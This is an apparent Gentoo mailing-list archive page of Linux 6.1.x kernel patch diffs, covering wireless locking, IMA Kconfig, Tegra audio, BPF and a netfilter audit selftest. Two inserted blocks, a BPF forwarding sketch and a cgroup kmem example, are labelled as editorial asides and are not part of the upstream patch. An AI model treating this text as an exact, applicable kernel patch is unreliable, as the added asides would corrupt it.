++++ b/net/wireless/sme.c
+@@ -5,7 +5,7 @@
+  * (for nl80211's connect() and wext)
+  *
+  * Copyright 2009	Johannes Berg <johannes@sipsolutions.net>
+- * Copyright (C) 2009, 2020, 2022 Intel Corporation. All rights reserved.
++ * Copyright (C) 2009, 2020, 2022-2023 Intel Corporation. All rights reserved.
+  * Copyright 2017	Intel Deutschland GmbH
+  */
+ 
+@@ -1555,6 +1555,7 @@ void cfg80211_autodisconnect_wk(struct work_struct *work)
+ 		container_of(work, struct wireless_dev, disconnect_wk);
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
+ 
++	wiphy_lock(wdev->wiphy);
+ 	wdev_lock(wdev);
+ 
+ 	if (wdev->conn_owner_nlportid) {
+@@ -1593,4 +1594,5 @@ void cfg80211_autodisconnect_wk(struct work_struct *work)
+ 	}
+ 
+ 	wdev_unlock(wdev);
++	wiphy_unlock(wdev->wiphy);
+ }
+diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
+index 0c3f05c9be27a..4d3b658030105 100644
+--- a/net/wireless/sysfs.c
++++ b/net/wireless/sysfs.c
+@@ -5,7 +5,7 @@
+  *
+  * Copyright 2005-2006	Jiri Benc <jbenc@suse.cz>
+  * Copyright 2006	Johannes Berg <johannes@sipsolutions.net>
+- * Copyright (C) 2020-2021 Intel Corporation
++ * Copyright (C) 2020-2021, 2023 Intel Corporation
+  */
+ 
+ #include <linux/device.h>
+@@ -105,14 +105,18 @@ static int wiphy_suspend(struct device *dev)
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
+ 		}
++		cfg80211_process_wiphy_works(rdev);
+ 		if (rdev->ops->suspend)
+ 			ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config);
+ 		if (ret == 1) {
+ 			/* Driver refuse to configure wowlan */
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
++			cfg80211_process_wiphy_works(rdev);
+ 			ret = rdev_suspend(rdev, NULL);
+ 		}
++		if (ret == 0)
++			rdev->suspended = true;
+ 	}
+ 	wiphy_unlock(&rdev->wiphy);
+ 	rtnl_unlock();
+@@ -132,6 +136,8 @@ static int wiphy_resume(struct device *dev)
+ 	wiphy_lock(&rdev->wiphy);
+ 	if (rdev->wiphy.registered && rdev->ops->resume)
+ 		ret = rdev_resume(rdev);
++	rdev->suspended = false;
++	schedule_work(&rdev->wiphy_work);
+ 	wiphy_unlock(&rdev->wiphy);
+ 
+ 	if (ret)
+diff --git a/scripts/mod/file2alias.c b/scripts/mod/file2alias.c
+index 80d973144fded..111d5464c12df 100644
+--- a/scripts/mod/file2alias.c
++++ b/scripts/mod/file2alias.c
+@@ -1577,7 +1577,7 @@ void handle_moddevtable(struct module *mod, struct elf_info *info,
+ 	/* First handle the "special" cases */
+ 	if (sym_is(name, namelen, "usb"))
+ 		do_usb_table(symval, sym->st_size, mod);
+-	if (sym_is(name, namelen, "of"))
++	else if (sym_is(name, namelen, "of"))
+ 		do_of_table(symval, sym->st_size, mod);
+ 	else if (sym_is(name, namelen, "pnp"))
+ 		do_pnp_device_entry(symval, sym->st_size, mod);
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index c17660bf5f347..6ef7bde551263 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -29,9 +29,11 @@ config IMA
+ 	  to learn more about IMA.
+ 	  If unsure, say N.
+ 
++if IMA
++
+ config IMA_KEXEC
+ 	bool "Enable carrying the IMA measurement list across a soft boot"
+-	depends on IMA && TCG_TPM && HAVE_IMA_KEXEC
++	depends on TCG_TPM && HAVE_IMA_KEXEC
+ 	default n
+ 	help
+ 	   TPM PCRs are only reset on a hard reboot.  In order to validate
+@@ -43,7 +45,6 @@ config IMA_KEXEC
+ 
+ config IMA_MEASURE_PCR_IDX
+ 	int
+-	depends on IMA
+ 	range 8 14
+ 	default 10
+ 	help
+@@ -53,7 +54,7 @@ config IMA_MEASURE_PCR_IDX
+ 
+ config IMA_LSM_RULES
+ 	bool
+-	depends on IMA && AUDIT && (SECURITY_SELINUX || SECURITY_SMACK || SECURITY_APPARMOR)
++	depends on AUDIT && (SECURITY_SELINUX || SECURITY_SMACK || SECURITY_APPARMOR)
+ 	default y
+ 	help
+ 	  Disabling this option will disregard LSM based policy rules.
+@@ -61,7 +62,6 @@ config IMA_LSM_RULES
+ choice
+ 	prompt "Default template"
+ 	default IMA_NG_TEMPLATE
+-	depends on IMA
+ 	help
+ 	  Select the default IMA measurement template.
+ 
+@@ -80,14 +80,12 @@ endchoice
+ 
+ config IMA_DEFAULT_TEMPLATE
+ 	string
+-	depends on IMA
+ 	default "ima-ng" if IMA_NG_TEMPLATE
+ 	default "ima-sig" if IMA_SIG_TEMPLATE
+ 
+ choice
+ 	prompt "Default integrity hash algorithm"
+ 	default IMA_DEFAULT_HASH_SHA1
+-	depends on IMA
+ 	help
+ 	   Select the default hash algorithm used for the measurement
+ 	   list, integrity appraisal and audit log.  The compiled default
+@@ -117,7 +115,6 @@ endchoice
+ 
+ config IMA_DEFAULT_HASH
+ 	string
+-	depends on IMA
+ 	default "sha1" if IMA_DEFAULT_HASH_SHA1
+ 	default "sha256" if IMA_DEFAULT_HASH_SHA256
+ 	default "sha512" if IMA_DEFAULT_HASH_SHA512
+@@ -126,7 +123,6 @@ config IMA_DEFAULT_HASH
+ 
+ config IMA_WRITE_POLICY
+ 	bool "Enable multiple writes to the IMA policy"
+-	depends on IMA
+ 	default n
+ 	help
+ 	  IMA policy can now be updated multiple times.  The new rules get
+@@ -137,7 +133,6 @@ config IMA_WRITE_POLICY
+ 
+ config IMA_READ_POLICY
+ 	bool "Enable reading back the current IMA policy"
+-	depends on IMA
+ 	default y if IMA_WRITE_POLICY
+ 	default n if !IMA_WRITE_POLICY
+ 	help
+@@ -147,7 +142,6 @@ config IMA_READ_POLICY
+ 
+ config IMA_APPRAISE
+ 	bool "Appraise integrity measurements"
+-	depends on IMA
+ 	default n
+ 	help
+ 	  This option enables local measurement integrity appraisal.
+@@ -268,7 +262,7 @@ config IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY
+ config IMA_BLACKLIST_KEYRING
+ 	bool "Create IMA machine owner blacklist keyrings (EXPERIMENTAL)"
+ 	depends on SYSTEM_TRUSTED_KEYRING
+-	depends on IMA_TRUSTED_KEYRING
++	depends on INTEGRITY_TRUSTED_KEYRING
+ 	default n
+ 	help
+ 	   This option creates an IMA blacklist keyring, which contains all
+@@ -278,7 +272,7 @@ config IMA_BLACKLIST_KEYRING
+ 
+ config IMA_LOAD_X509
+ 	bool "Load X509 certificate onto the '.ima' trusted keyring"
+-	depends on IMA_TRUSTED_KEYRING
++	depends on INTEGRITY_TRUSTED_KEYRING
+ 	default n
+ 	help
+ 	   File signature verification is based on the public keys
+@@ -303,7 +297,6 @@ config IMA_APPRAISE_SIGNED_INIT
+ 
+ config IMA_MEASURE_ASYMMETRIC_KEYS
+ 	bool
+-	depends on IMA
+ 	depends on ASYMMETRIC_PUBLIC_KEY_SUBTYPE=y
+ 	default y
+ 
+@@ -322,7 +315,8 @@ config IMA_SECURE_AND_OR_TRUSTED_BOOT
+ 
+ config IMA_DISABLE_HTABLE
+ 	bool "Disable htable to allow measurement of duplicate records"
+-	depends on IMA
+ 	default n
+ 	help
+ 	   This option disables htable to allow measurement of duplicate records.
++
++endif
+diff --git a/sound/soc/soc-utils.c b/sound/soc/soc-utils.c
+index a4dba0b751e76..1bbd1d077dfd9 100644
+--- a/sound/soc/soc-utils.c
++++ b/sound/soc/soc-utils.c
+@@ -217,6 +217,7 @@ int snd_soc_dai_is_dummy(struct snd_soc_dai *dai)
+ 		return 1;
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(snd_soc_dai_is_dummy);
+ 
+ int snd_soc_component_is_dummy(struct snd_soc_component *component)
+ {
+diff --git a/sound/soc/tegra/tegra_audio_graph_card.c b/sound/soc/tegra/tegra_audio_graph_card.c
+index 1f2c5018bf5ac..4737e776d3837 100644
+--- a/sound/soc/tegra/tegra_audio_graph_card.c
++++ b/sound/soc/tegra/tegra_audio_graph_card.c
+@@ -10,6 +10,7 @@
+ #include <linux/platform_device.h>
+ #include <sound/graph_card.h>
+ #include <sound/pcm_params.h>
++#include <sound/soc-dai.h>
+ 
+ #define MAX_PLLA_OUT0_DIV 128
+ 
+@@ -44,6 +45,21 @@ struct tegra_audio_cdata {
+ 	unsigned int plla_out0_rates[NUM_RATE_TYPE];
+ };
+ 
++static bool need_clk_update(struct snd_soc_dai *dai)
++{
++	if (snd_soc_dai_is_dummy(dai) ||
++	    !dai->driver->ops ||
++	    !dai->driver->name)
++		return false;
++
++	if (strstr(dai->driver->name, "I2S") ||
++	    strstr(dai->driver->name, "DMIC") ||
++	    strstr(dai->driver->name, "DSPK"))
++		return true;
++
++	return false;
++}
++
+ /* Setup PLL clock as per the given sample rate */
+ static int tegra_audio_graph_update_pll(struct snd_pcm_substream *substream,
+ 					struct snd_pcm_hw_params *params)
+@@ -140,19 +156,7 @@ static int tegra_audio_graph_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+ 	int err;
+ 
+-	/*
+-	 * This gets called for each DAI link (FE or BE) when DPCM is used.
+-	 * We may not want to update PLLA rate for each call. So PLLA update
+-	 * must be restricted to external I/O links (I2S, DMIC or DSPK) since
+-	 * they actually depend on it. I/O modules update their clocks in
+-	 * hw_param() of their respective component driver and PLLA rate
+-	 * update here helps them to derive appropriate rates.
+-	 *
+-	 * TODO: When more HW accelerators get added (like sample rate
+-	 * converter, volume gain controller etc., which don't really
+-	 * depend on PLLA) we need a better way to filter here.
+-	 */
+-	if (cpu_dai->driver->ops && rtd->dai_link->no_pcm) {
++	if (need_clk_update(cpu_dai)) {
+ 		err = tegra_audio_graph_update_pll(substream, params);
+ 		if (err)
+ 			return err;
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 53bc487947197..92dbe89dafbf5 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -3112,6 +3112,11 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
++ *		**BPF_FIB_LOOKUP_SKIP_NEIGH**
++ *			Skip the neighbour table lookup. *params*->dmac
++ *			and *params*->smac will not be set as output. A common
++ *			use case is to call **bpf_redirect_neigh**\ () after
++ *			doing **bpf_fib_lookup**\ ().
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6678,6 +6683,7 @@ struct bpf_raw_tracepoint_args {
+ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
++	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
+ };
+ 
+ enum {
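+
+[Editorial aside, not part of the patch: the helper documentation above
+suggests pairing BPF_FIB_LOOKUP_SKIP_NEIGH with bpf_redirect_neigh().
+A minimal tc-BPF sketch of that pattern follows; it assumes clang -O2
+-target bpf with libbpf headers, and real code would first parse the
+packet's IP header into the lookup params.
+
+	// SPDX-License-Identifier: GPL-2.0
+	#include <linux/bpf.h>
+	#include <linux/pkt_cls.h>
+	#include <bpf/bpf_helpers.h>
+
+	SEC("tc")
+	int fwd(struct __sk_buff *skb)
+	{
+		struct bpf_fib_lookup p = {
+			.family  = 2,			/* AF_INET */
+			.ifindex = skb->ingress_ifindex,
+		};
+		long rc;
+
+		/* Fill p.ipv4_src/p.ipv4_dst from the IP header here. */
+		rc = bpf_fib_lookup(skb, &p, sizeof(p),
+				    BPF_FIB_LOOKUP_SKIP_NEIGH);
+		if (rc != BPF_FIB_LKUP_RET_SUCCESS)
+			return TC_ACT_OK;	/* let the stack handle it */
+
+		/* dmac/smac were skipped; resolve L2 on the way out. */
+		return bpf_redirect_neigh(p.ifindex, NULL, 0, 0);
+	}
+
+	char _license[] SEC("license") = "GPL";
+
+Skipping the neighbour lookup avoids redundant work when the L2 address
+is resolved by bpf_redirect_neigh() anyway.]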
+diff --git a/tools/testing/selftests/netfilter/.gitignore b/tools/testing/selftests/netfilter/.gitignore
+index 4cb887b574138..4b2928e1c19d8 100644
+--- a/tools/testing/selftests/netfilter/.gitignore
++++ b/tools/testing/selftests/netfilter/.gitignore
+@@ -1,3 +1,4 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ nf-queue
+ connect_close
++audit_logread
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 3686bfa6c58d7..321db8850da00 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -6,13 +6,13 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	nft_concat_range.sh nft_conntrack_helper.sh \
+ 	nft_queue.sh nft_meta.sh nf_nat_edemux.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+-	conntrack_vrf.sh nft_synproxy.sh rpath.sh
++	conntrack_vrf.sh nft_synproxy.sh rpath.sh nft_audit.sh
+ 
+ HOSTPKG_CONFIG := pkg-config
+ 
+ CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
+ LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
+ 
+-TEST_GEN_FILES =  nf-queue connect_close
++TEST_GEN_FILES =  nf-queue connect_close audit_logread
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/netfilter/audit_logread.c b/tools/testing/selftests/netfilter/audit_logread.c
+new file mode 100644
+index 0000000000000..a0a880fc2d9de
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/audit_logread.c
+@@ -0,0 +1,165 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#define _GNU_SOURCE
++#include <errno.h>
++#include <fcntl.h>
++#include <poll.h>
++#include <signal.h>
++#include <stdint.h>
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++#include <sys/socket.h>
++#include <unistd.h>
++#include <linux/audit.h>
++#include <linux/netlink.h>
++
++static int fd;
++
++#define MAX_AUDIT_MESSAGE_LENGTH	8970
++struct audit_message {
++	struct nlmsghdr nlh;
++	union {
++		struct audit_status s;
++		char data[MAX_AUDIT_MESSAGE_LENGTH];
++	} u;
++};
++
++int audit_recv(int fd, struct audit_message *rep)
++{
++	struct sockaddr_nl addr;
++	socklen_t addrlen = sizeof(addr);
++	int ret;
++
++	do {
++		ret = recvfrom(fd, rep, sizeof(*rep), 0,
++			       (struct sockaddr *)&addr, &addrlen);
++	} while (ret < 0 && errno == EINTR);
++
++	if (ret < 0 ||
++	    addrlen != sizeof(addr) ||
++	    addr.nl_pid != 0 ||
++	    rep->nlh.nlmsg_type == NLMSG_ERROR) /* short-cut for now */
++		return -1;
++
++	return ret;
++}
++
++int audit_send(int fd, uint16_t type, uint32_t key, uint32_t val)
++{
++	static int seq = 0;
++	struct audit_message msg = {
++		.nlh = {
++			.nlmsg_len   = NLMSG_SPACE(sizeof(msg.u.s)),
++			.nlmsg_type  = type,
++			.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
++			.nlmsg_seq   = ++seq,
++		},
++		.u.s = {
++			.mask    = key,
++			.enabled = key == AUDIT_STATUS_ENABLED ? val : 0,
++			.pid     = key == AUDIT_STATUS_PID ? val : 0,
++		}
++	};
++	struct sockaddr_nl addr = {
++		.nl_family = AF_NETLINK,
++	};
++	int ret;
++
++	do {
++		ret = sendto(fd, &msg, msg.nlh.nlmsg_len, 0,
++			     (struct sockaddr *)&addr, sizeof(addr));
++	} while (ret < 0 && errno == EINTR);
++
++	if (ret != (int)msg.nlh.nlmsg_len)
++		return -1;
++	return 0;
++}
++
++int audit_set(int fd, uint32_t key, uint32_t val)
++{
++	struct audit_message rep = { 0 };
++	int ret;
++
++	ret = audit_send(fd, AUDIT_SET, key, val);
++	if (ret)
++		return ret;
++
++	ret = audit_recv(fd, &rep);
++	if (ret < 0)
++		return ret;
++	return 0;
++}
++
++int readlog(int fd)
++{
++	struct audit_message rep = { 0 };
++	int ret = audit_recv(fd, &rep);
++	const char *sep = "";
++	char *k, *v;
++
++	if (ret < 0)
++		return ret;
++
++	if (rep.nlh.nlmsg_type != AUDIT_NETFILTER_CFG)
++		return 0;
++
++	/* skip the initial "audit(...): " part */
++	strtok(rep.u.data, " ");
++
++	while ((k = strtok(NULL, "="))) {
++		v = strtok(NULL, " ");
++
++		/* these vary and/or are uninteresting, ignore */
++		if (!strcmp(k, "pid") ||
++		    !strcmp(k, "comm") ||
++		    !strcmp(k, "subj"))
++			continue;
++
++		/* strip the varying sequence number */
++		if (!strcmp(k, "table"))
++			*strchrnul(v, ':') = '\0';
++
++		printf("%s%s=%s", sep, k, v);
++		sep = " ";
++	}
++	if (*sep) {
++		printf("\n");
++		fflush(stdout);
++	}
++	return 0;
++}
++
++void cleanup(int sig)
++{
++	audit_set(fd, AUDIT_STATUS_ENABLED, 0);
++	close(fd);
++	if (sig)
++		exit(0);
++}
++
++int main(int argc, char **argv)
++{
++	struct sigaction act = {
++		.sa_handler = cleanup,
++	};
++
++	fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_AUDIT);
++	if (fd < 0) {
++		perror("Can't open netlink socket");
++		return -1;
++	}
++
++	if (sigaction(SIGTERM, &act, NULL) < 0 ||
++	    sigaction(SIGINT, &act, NULL) < 0) {
++		perror("Can't set signal handler");
++		close(fd);
++		return -1;
++	}
++
++	audit_set(fd, AUDIT_STATUS_ENABLED, 1);
++	audit_set(fd, AUDIT_STATUS_PID, getpid());
++
++	while (1)
++		readlog(fd);
++}
+diff --git a/tools/testing/selftests/netfilter/config b/tools/testing/selftests/netfilter/config
+index 4faf2ce021d90..7c42b1b2c69b4 100644
+--- a/tools/testing/selftests/netfilter/config
++++ b/tools/testing/selftests/netfilter/config
+@@ -6,3 +6,4 @@ CONFIG_NFT_REDIR=m
+ CONFIG_NFT_MASQ=m
+ CONFIG_NFT_FLOW_OFFLOAD=m
+ CONFIG_NF_CT_NETLINK=m
++CONFIG_AUDIT=y
+diff --git a/tools/testing/selftests/netfilter/nft_audit.sh b/tools/testing/selftests/netfilter/nft_audit.sh
+new file mode 100755
+index 0000000000000..bb34329e02a7f
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/nft_audit.sh
+@@ -0,0 +1,193 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++#
++# Check that audit logs generated for nft commands are as expected.
++
++SKIP_RC=4
++RC=0
++
++nft --version >/dev/null 2>&1 || {
++	echo "SKIP: missing nft tool"
++	exit $SKIP_RC
++}
++
++logfile=$(mktemp)
++rulefile=$(mktemp)
++echo "logging into $logfile"
++./audit_logread >"$logfile" &
++logread_pid=$!
++trap 'kill $logread_pid; rm -f $logfile $rulefile' EXIT
++exec 3<"$logfile"
++
++do_test() { # (cmd, log)
++	echo -n "testing for cmd: $1 ... "
++	cat <&3 >/dev/null
++	$1 >/dev/null || exit 1
++	sleep 0.1
++	res=$(diff -a -u <(echo "$2") - <&3)
++	[ $? -eq 0 ] && { echo "OK"; return; }
++	echo "FAIL"
++	grep -v '^\(---\|+++\|@@\)' <<< "$res"
++	((RC--))
++}
++
++nft flush ruleset
++
++# adding tables, chains and rules
++
++for table in t1 t2; do
++	do_test "nft add table $table" \
++	"table=$table family=2 entries=1 op=nft_register_table"
++
++	do_test "nft add chain $table c1" \
++	"table=$table family=2 entries=1 op=nft_register_chain"
++
++	do_test "nft add chain $table c2; add chain $table c3" \
++	"table=$table family=2 entries=2 op=nft_register_chain"
++
++	cmd="add rule $table c1 counter"
++
++	do_test "nft $cmd" \
++	"table=$table family=2 entries=1 op=nft_register_rule"
++
++	do_test "nft $cmd; $cmd" \
++	"table=$table family=2 entries=2 op=nft_register_rule"
++
++	cmd=""
++	sep=""
++	for chain in c2 c3; do
++		for i in {1..3}; do
++			cmd+="$sep add rule $table $chain counter"
++			sep=";"
++		done
++	done
++	do_test "nft $cmd" \
++	"table=$table family=2 entries=6 op=nft_register_rule"
++done
++
++for ((i = 0; i < 500; i++)); do
++	echo "add rule t2 c3 counter accept comment \"rule $i\""
++done >$rulefile
++do_test "nft -f $rulefile" \
++'table=t2 family=2 entries=500 op=nft_register_rule'
++
++# adding sets and elements
++
++settype='type inet_service; counter'
++setelem='{ 22, 80, 443 }'
++setblock="{ $settype; elements = $setelem; }"
++do_test "nft add set t1 s $setblock" \
++"table=t1 family=2 entries=4 op=nft_register_set"
++
++do_test "nft add set t1 s2 $setblock; add set t1 s3 { $settype; }" \
++"table=t1 family=2 entries=5 op=nft_register_set"
++
++do_test "nft add element t1 s3 $setelem" \
++"table=t1 family=2 entries=3 op=nft_register_setelem"
++
++# adding counters
++
++do_test 'nft add counter t1 c1' \
++'table=t1 family=2 entries=1 op=nft_register_obj'
++
++do_test 'nft add counter t2 c1; add counter t2 c2' \
++'table=t2 family=2 entries=2 op=nft_register_obj'
++
++# adding/updating quotas
++
++do_test 'nft add quota t1 q1 { 10 bytes }' \
++'table=t1 family=2 entries=1 op=nft_register_obj'
++
++do_test 'nft add quota t2 q1 { 10 bytes }; add quota t2 q2 { 10 bytes }' \
++'table=t2 family=2 entries=2 op=nft_register_obj'
++
++# changing the quota value triggers obj update path
++do_test 'nft add quota t1 q1 { 20 bytes }' \
++'table=t1 family=2 entries=1 op=nft_register_obj'
++
++# resetting rules
++
++do_test 'nft reset rules t1 c2' \
++'table=t1 family=2 entries=3 op=nft_reset_rule'
++
++do_test 'nft reset rules table t1' \
++'table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule'
++
++do_test 'nft reset rules t2 c3' \
++'table=t2 family=2 entries=189 op=nft_reset_rule
++table=t2 family=2 entries=188 op=nft_reset_rule
++table=t2 family=2 entries=126 op=nft_reset_rule'
++
++do_test 'nft reset rules t2' \
++'table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=186 op=nft_reset_rule
++table=t2 family=2 entries=188 op=nft_reset_rule
++table=t2 family=2 entries=129 op=nft_reset_rule'
++
++do_test 'nft reset rules' \
++'table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule
++table=t1 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=3 op=nft_reset_rule
++table=t2 family=2 entries=180 op=nft_reset_rule
++table=t2 family=2 entries=188 op=nft_reset_rule
++table=t2 family=2 entries=135 op=nft_reset_rule'
++
++# resetting sets and elements
++
++elem=(22 ,80 ,443)
++relem=""
++for i in {1..3}; do
++	relem+="${elem[((i - 1))]}"
++	do_test "nft reset element t1 s { $relem }" \
++	"table=t1 family=2 entries=$i op=nft_reset_setelem"
++done
++
++do_test 'nft reset set t1 s' \
++'table=t1 family=2 entries=3 op=nft_reset_setelem'
++
++# deleting rules
++
++readarray -t handles < <(nft -a list chain t1 c1 | \
++			 sed -n 's/.*counter.* handle \(.*\)$/\1/p')
++
++do_test "nft delete rule t1 c1 handle ${handles[0]}" \
++'table=t1 family=2 entries=1 op=nft_unregister_rule'
++
++cmd='delete rule t1 c1 handle'
++do_test "nft $cmd ${handles[1]}; $cmd ${handles[2]}" \
++'table=t1 family=2 entries=2 op=nft_unregister_rule'
++
++do_test 'nft flush chain t1 c2' \
++'table=t1 family=2 entries=3 op=nft_unregister_rule'
++
++do_test 'nft flush table t2' \
++'table=t2 family=2 entries=509 op=nft_unregister_rule'
++
++# deleting chains
++
++do_test 'nft delete chain t2 c2' \
++'table=t2 family=2 entries=1 op=nft_unregister_chain'
++
++# deleting sets and elements
++
++do_test 'nft delete element t1 s { 22 }' \
++'table=t1 family=2 entries=1 op=nft_unregister_setelem'
++
++do_test 'nft delete element t1 s { 80, 443 }' \
++'table=t1 family=2 entries=2 op=nft_unregister_setelem'
++
++do_test 'nft flush set t1 s2' \
++'table=t1 family=2 entries=3 op=nft_unregister_setelem'
++
++do_test 'nft delete set t1 s2' \
++'table=t1 family=2 entries=1 op=nft_unregister_set'
++
++do_test 'nft delete set t1 s3' \
++'table=t1 family=2 entries=1 op=nft_unregister_set'
++
++exit $RC


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-06 13:18 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-06 13:18 UTC (permalink / raw
  To: gentoo-commits

commit:     0fa2adcf7c71594b742f6a33f82f22fca6bcade9
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Oct  6 13:18:06 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Oct  6 13:18:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0fa2adcf

Linux patch 6.1.56

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1055_linux-6.1.56.patch | 11323 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11327 insertions(+)

diff --git a/0000_README b/0000_README
index 3723582e..b5768a62 100644
--- a/0000_README
+++ b/0000_README
@@ -263,6 +263,10 @@ Patch:  1054_linux-6.1.55.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.55
 
+Patch:  1055_linux-6.1.56.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.56
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1055_linux-6.1.56.patch b/1055_linux-6.1.56.patch
new file mode 100644
index 00000000..c67d69e5
--- /dev/null
+++ b/1055_linux-6.1.56.patch
@@ -0,0 +1,11323 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 2524061836acc..40164f2881e17 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -91,8 +91,13 @@ Brief summary of control files.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
+- memory.kmem.limit_in_bytes          This knob is deprecated and writing to
+-                                     it will return -ENOTSUPP.
++ memory.kmem.limit_in_bytes          Deprecated knob to set and read the kernel
++                                     memory hard limit. Kernel hard limit is not
++                                     supported since 5.16. Writing any value to
++                                     do file will not have any effect same as if
++                                     nokmem kernel parameter was specified.
++                                     Kernel memory is still charged and reported
++                                     by memory.kmem.usage_in_bytes.
+  memory.kmem.usage_in_bytes          show current kernel memory allocation
+  memory.kmem.failcnt                 show the number of kernel memory usage
+ 				     hits limits
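+
+[Editorial aside, not part of the patch: a hedged userspace sketch of
+the behaviour the new text describes. The cgroup path and value below
+are assumptions for illustration, and the file exists only on cgroup v1
+mounts; the write is accepted, yet, as with the nokmem parameter, no
+limit is enforced.
+
+	#include <stdio.h>
+
+	int main(void)
+	{
+		const char *path =
+			"/sys/fs/cgroup/memory/demo/memory.kmem.limit_in_bytes";
+		char buf[64];
+		FILE *fp = fopen(path, "w");
+
+		if (!fp) {
+			perror("open");
+			return 1;
+		}
+		fprintf(fp, "1048576\n");	/* request a 1 MiB "limit" */
+		fclose(fp);
+
+		fp = fopen(path, "r");	/* not enforced; kmem is still charged */
+		if (fp && fgets(buf, sizeof(buf), fp))
+			printf("file now reads: %s", buf);
+		return 0;
+	}
+]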
+diff --git a/Makefile b/Makefile
+index 3d839824a7224..9ceda3dad5eb7 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 55
++SUBLEVEL = 56
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am335x-guardian.dts b/arch/arm/boot/dts/am335x-guardian.dts
+index f6356266564c8..b357364e93f99 100644
+--- a/arch/arm/boot/dts/am335x-guardian.dts
++++ b/arch/arm/boot/dts/am335x-guardian.dts
+@@ -103,8 +103,9 @@
+ 
+ 	};
+ 
+-	guardian_beeper: dmtimer-pwm@7 {
++	guardian_beeper: pwm-7 {
+ 		compatible = "ti,omap-dmtimer-pwm";
++		#pwm-cells = <3>;
+ 		ti,timers = <&timer7>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&guardian_beeper_pins>;
+diff --git a/arch/arm/boot/dts/am3517-evm.dts b/arch/arm/boot/dts/am3517-evm.dts
+index 35b653014f2b0..7bab0a9dadb30 100644
+--- a/arch/arm/boot/dts/am3517-evm.dts
++++ b/arch/arm/boot/dts/am3517-evm.dts
+@@ -150,7 +150,7 @@
+ 		enable-gpios = <&gpio6 22 GPIO_ACTIVE_HIGH>; /* gpio_182 */
+ 	};
+ 
+-	pwm11: dmtimer-pwm@11 {
++	pwm11: pwm-11 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pwm_pins>;
+diff --git a/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts b/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts
